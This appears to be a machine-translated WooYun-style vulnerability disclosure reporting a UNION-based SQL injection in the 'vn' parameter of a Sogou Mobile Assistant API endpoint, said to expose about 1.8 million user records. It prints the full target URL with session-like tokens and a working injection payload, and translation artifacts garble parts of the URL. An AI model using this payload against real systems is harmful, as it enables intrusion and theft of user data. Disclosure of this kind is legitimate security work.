漏洞标题 搜狗移动助手APP一个SQL注入(涉及近180W +用户数据) 相关制造商 搜狗 漏洞作者 过路人 提交时间 2016-05-11 09: 31 公共时间 2016-06-28 08: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标:搜狗移动助手Android APP 测试发现在以下地方有SQL注入:(注入参数vn,联合查询) http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 有效载荷:(返回搜索1111111111 ~~) http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1%27%20union%20select%201111111111111,null,null,null,null,null,null,null,null ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20 - %20-&安培;通道=A33003001&安培; sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&安培; stoken==R1fTz7EJBVCutv3iFzOUFg&安培; CELLID=cdma_13844_19857_2&安培; SC=0 漏洞证明: 1,当前数据库用户
2,所有数据库
3,用户表,涉及近180W +用户数据
修理计划: 请多指教〜 版权声明:请注明出处。居民A @乌云